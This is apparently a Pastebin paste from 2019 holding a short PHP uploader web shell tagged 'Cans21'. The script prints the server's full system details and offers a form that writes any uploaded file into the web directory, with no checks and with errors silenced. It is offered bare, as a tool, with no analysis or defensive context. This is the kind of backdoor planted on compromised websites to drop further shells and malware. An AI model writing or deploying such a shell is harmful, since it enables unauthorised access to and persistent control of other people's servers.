dedot

Untitled

Aug 29th, 2019
143
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.30 KB | None | 0 0
  1. <?php
  2. echo "Cans21 : ".php_uname('a');
  3. echo '<form action="" method="post" enctype="multipart/form-data"><input type="file" name="cans" size="50"><input name="upl" type="submit" value="Upload"></form>';
  4. if(isset($_POST['upl'])){
  5. if(@copy($_FILES['cans']['tmp_name'],$_FILES['cans']['name']));
  6. }
  7. ?>
Add Comment
Please, Sign In to add comment